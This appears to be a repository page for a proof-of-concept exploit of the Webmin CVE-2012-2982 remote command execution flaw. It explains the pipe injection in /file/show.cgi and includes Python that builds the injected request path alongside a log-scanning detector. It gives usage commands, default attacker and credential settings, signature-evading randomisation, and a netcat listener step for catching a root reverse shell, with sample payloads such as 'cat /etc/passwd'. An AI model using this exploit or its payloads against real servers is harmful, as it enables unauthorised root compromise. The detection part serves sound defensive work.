Related vulnerability
Description
PoC exploit for CVE-2012-2982 (Webmin RCE), for educational purposes.
Introduction
# Webmin 1.590 Remote Command Execution Exploit (CVE-2012-2982)
## Overview
This repository contains a Proof-of-Concept (PoC) exploit for **CVE-2012-2982**, an authenticated remote command execution vulnerability affecting **Webmin 1.590 and earlier**. The flaw is in the File Manager's **/file/show.cgi** endpoint: the file path taken from the request is handed to Perl's two-argument `open()`, so a path that ends in a `|` (pipe) character is treated as a command to run rather than a file to read, and the attacker's injected command executes on the server.
This PoC is intended for **educational and security research purposes only**. Unauthorized exploitation of systems without permission is illegal and unethical.
## CVE-2012-2982 Details
### Description
Webmin is a widely used web-based system administration tool for Unix-like systems. In **versions 1.590 and earlier**, the **File Manager module** does not sanitise the path it receives through **/file/show.cgi** before opening it. Because the open uses Perl's two-argument form, a path carrying a shell metacharacter such as a trailing `|` is executed as a command, so any authenticated user who can reach the module can run arbitrary commands with the **privileges of the Webmin process**, which is normally root.
### Impact
- **Affected versions**: Webmin **1.590 and earlier**
- **Attack prerequisites**:
  - Valid Webmin credentials (a low-privileged account is enough, as long as it can reach the File Manager module).
  - The File Manager module must be enabled and accessible to that account.
- **Exploitation allows**:
  - Remote code execution (RCE)
  - Command execution as root when Webmin runs as root (the default on most installs)
  - Full system compromise
### Vulnerable Endpoint
The vulnerable endpoint is:
```
http://<target_ip>:10000/file/show.cgi
```
Webmin's miniserv listens on TCP port 10000 by default and is commonly served over HTTPS; use `https://` if SSL is enabled on the target. The attack appends the injected command and a trailing `|` to the file path component of this URL; show.cgi opens that string as if it were a file, and the trailing pipe makes Perl run the text before it as a shell command instead of reading a file.
## PoC Exploit
This repository contains a Python exploit script that automates:
1. **Authentication**: Logs into Webmin through `session_login.cgi` using the configured credentials.
2. **Session ID Extraction**: Reads the `sid` session cookie from the login response; it is required on every subsequent authenticated request.
3. **Payload Execution**: Sends the crafted `/file/show.cgi` request with the command and trailing `|` in the path, which executes it on the target.
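The mechanism and the request shape described above, as an added worked example in Python (this is not the repository's `exploit.py` and not Webmin code): a simplified model of how Perl's two-argument `open()` classifies a filename, a builder for the injected `/file/show.cgi` path in the layout used by the public Metasploit module this README links to, and a log-side check that flags such requests after percent-decoding. The `/bin/<random>|<command>|` layout and the `open()` model are assumptions to confirm against the real script and the Webmin source; the log lines are constructed CLF-style samples in the shape of Webmin's `miniserv.log`. Nothing here sends traffic.

```python
"""Added example for CVE-2012-2982 (not the repository's exploit.py).

Three pieces, all offline:
  * two_arg_open_mode()    - simplified model of Perl's two-argument open()
  * build_show_cgi_path()  - the injected /file/show.cgi path an exploit requests
  * scan_log()             - flags such requests in CLF-style log lines
"""
import re
import secrets
import string
from urllib.parse import quote, unquote

SHOW_CGI = "/file/show.cgi"
# Characters that have no business in a path handed to show.cgi.
SHELL_META = set("|;`$&")


def two_arg_open_mode(filename: str) -> str:
    """Return how Perl's two-argument open(FH, $filename) treats $filename.

    Simplified model (assumption: real Perl also handles '+<', '-', '&=' and
    more whitespace trimming).  The case that matters here is the trailing
    '|': open() runs the text before the pipe as a shell command and hands
    the caller its stdout.  The fix is the three-argument form
    open(FH, '<', $filename), which never interprets the filename.
    """
    f = filename.strip()
    if f.startswith("|"):
        return "pipe-to"    # rest is a command; writes go to its stdin
    if f.endswith("|"):
        return "pipe-from"  # command output is read: the CVE-2012-2982 case
    if f.startswith(">>"):
        return "append"
    if f.startswith(">"):
        return "write"
    if f.startswith("<"):
        return "read"
    return "read"           # plain file name, opened read-only


def build_show_cgi_path(command: str, rand_len: int = 5) -> str:
    """Build the request path an exploit sends (layout assumed from the
    Metasploit module: a random dummy file name, then '|<command>|')."""
    alphabet = string.ascii_letters + string.digits
    token = "".join(secrets.choice(alphabet) for _ in range(rand_len))
    # Percent-encode the command so spaces and quotes survive the request
    # line; the two pipes stay literal so Perl's open() sees them.
    return f"{SHOW_CGI}/bin/{token}|{quote(command, safe='/')}|"


# Common Log Format, the shape of Webmin's miniserv.log (assumption: adjust
# the regex if your server logs differently).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def is_show_cgi_injection(request_path: str) -> bool:
    """True if the decoded path targets /file/show.cgi and carries a shell
    metacharacter in its file-path part.  Percent-decoding first defeats the
    obvious evasion of sending '|' as %7C."""
    decoded = unquote(request_path.split("?", 1)[0])
    if not decoded.startswith(SHOW_CGI + "/"):
        return False
    return any(c in SHELL_META for c in decoded[len(SHOW_CGI):])


def scan_log(lines):
    """Return (ip, user, decoded_path) for every suspicious show.cgi request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_show_cgi_injection(m["path"]):
            hits.append((m["ip"], m["user"], unquote(m["path"])))
    return hits


# Constructed sample log lines (not real traffic): a login, a legitimate
# file view, a raw-pipe injection and a percent-encoded one.
SAMPLE_LOG = [
    '192.0.2.10 - user1 [10/Sep/2012:10:01:12 +0000] "POST /session_login.cgi HTTP/1.1" 302 0',
    '192.0.2.10 - user1 [10/Sep/2012:10:01:13 +0000] "GET /file/show.cgi/etc/hostname HTTP/1.1" 200 64',
    '192.0.2.10 - user1 [10/Sep/2012:10:01:14 +0000] "GET /file/show.cgi/bin/k7dQ2|id| HTTP/1.1" 200 88',
    '192.0.2.10 - user1 [10/Sep/2012:10:01:15 +0000] "GET /file/show.cgi/bin/aB3xZ%7Ccat%20/etc/passwd%7C HTTP/1.1" 200 1604',
]

if __name__ == "__main__":
    print(two_arg_open_mode("/bin/k7dQ2|id|"))   # pipe-from
    print(build_show_cgi_path("id"))              # /file/show.cgi/bin/<5 chars>|id|
    for hit in scan_log(SAMPLE_LOG):
        print("suspicious show.cgi request:", hit)
```

Run it directly to see the classification, a freshly generated path and the two flagged log lines. A legitimate file name containing `|` would also be flagged, which is an acceptable false-positive rate for this endpoint; the percent-decoding step is the important part, since a raw-string match on `|` alone misses the encoded variant.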
### Features
- **Randomized Execution Path**: Inserts a randomly generated dummy filename before the injected command, so the request path is not a fixed string that a simple signature can match.
- **Reverse Shell Support**: Generates a reverse shell payload to connect back to the attacker's machine.
- **Error Handling**: Handles request failures gracefully.
- **Modular Design**: Easy to modify for testing different payloads.
## Installation & Usage
### Prerequisites
- Python 3
- `requests` library (`pip install requests`)
- A Webmin instance (vulnerable version) for testing (use a controlled lab environment)
### Running the Exploit
**Usage:**
```
python3 exploit.py <target_IP>
```
Example:
```
python3 exploit.py 192.168.1.100
```
#### Default Configuration (Modify as Needed)
- **Attacker IP (`lhost`)**: `10.21.48.124`
- **Attacker Port (`lport`)**: `1937`
- **Target Webmin Credentials**:
  - Username: `user1`
  - Password: `1user`
If successful, the exploit establishes a reverse shell connection to the attacker's machine.
## Setting Up Netcat Listener on the Attack Machine
Before running the exploit, start a **Netcat listener** on your attack machine on the port configured as `lport` (1937 by default) to receive the reverse shell:
```
nc -lvnp 1937
```
Once the exploit executes successfully, you should receive a shell connection from the target machine.
## Educational Purpose Only
This PoC is strictly for **security research and educational purposes**. It should only be used in **authorized penetration testing environments**. Unauthorized use against production systems is a **violation of cybersecurity laws** and may result in legal consequences.
## References
- [Official CVE Entry](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2982)
- [Metasploit Module](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/webmin_show_cgi_exec.rb)
- [American InfoSec Advisory](http://www.americaninfosec.com/research/dossiers/AISG-12-001.pdf)
## Disclaimer
The author is **not responsible** for any misuse of this exploit. Use this PoC **only for legal security testing** and ethical hacking activities.
File snapshot
[4.0K] /data/pocs/a6f518181c682ab2f178fe2f32e2162fbb22e86d
├── [2.3K] cve-2012-2982-exploit.py
├── [1.0K] LICENSE
└── [4.2K] README.md
0 directories, 3 files